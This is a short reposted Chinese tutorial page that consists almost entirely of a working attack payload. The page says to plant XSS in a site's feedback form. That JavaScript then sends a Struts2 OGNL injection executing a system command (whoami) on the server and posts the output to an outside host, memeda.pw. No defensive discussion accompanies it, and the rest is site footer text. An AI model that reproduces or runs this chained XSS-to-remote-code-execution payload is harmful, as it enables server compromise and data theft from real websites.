来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 在吐槽处插入XSS代码function up_data(data){var up_result;var data=encodeURIComponent(data);var mlhttp=new XMLHttpRequest();mlhttp onreadystatechange=function(){if(mlhttp readyState==4){up_resu...
在吐槽处插入XSS代码 function up_data(data) { var up_result; var data=encodeURIComponent(data); var mlhttp=new XMLHttpRequest(); mlhttp.onreadystatechange=function() { if(mlhttp.readyState==4) { up_result=mlhttp.responseText; } } mlhttp.open("POST","http://www.memeda.pw/g.php",true); mlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); mlhttp.send("data="+data); } function get_web_by_get(url){ var lhttp=new XMLHttpRequest(); var get_result; lhttp.onreadystatechange=function() {if(lhttp.readyState==4) { get_result=lhttp.responseText; } } lhttp.open("GET",url,false) lhttp.send(); return get_result; } var sdata=get_web_by_get("/toViewFeedBack.action?('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43req\\75@org.apache.struts2.ServletActionContext@getRequest()')(d))&(h)(('\\43webRootzpro\\75@java.lang.Runtime@getRuntime().exec(\\43req.getParameter(%22cmd%22))')(d))&(i)(('\\43webRootzproreader\\75new\\40java.io.DataInputStream(\\43webRootzpro.getInputStream())')(d))&(i01)(('\\43webStr\\75new\\40byte[51020]')(d))&(i1)(('\\43webRootzproreader.readFully(\\43webStr)')(d))&(i111)(('\\43webStr12\\75new\\40java.lang.String(\\43webStr)')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i2)(('\\43xman\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(i95)(('\\43xman.getWriter().println(\\43webStr12)')(d))&(i99)(('\\43xman.getWriter().close()')(d))&cmd=whoami"); up_data(sdata);
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com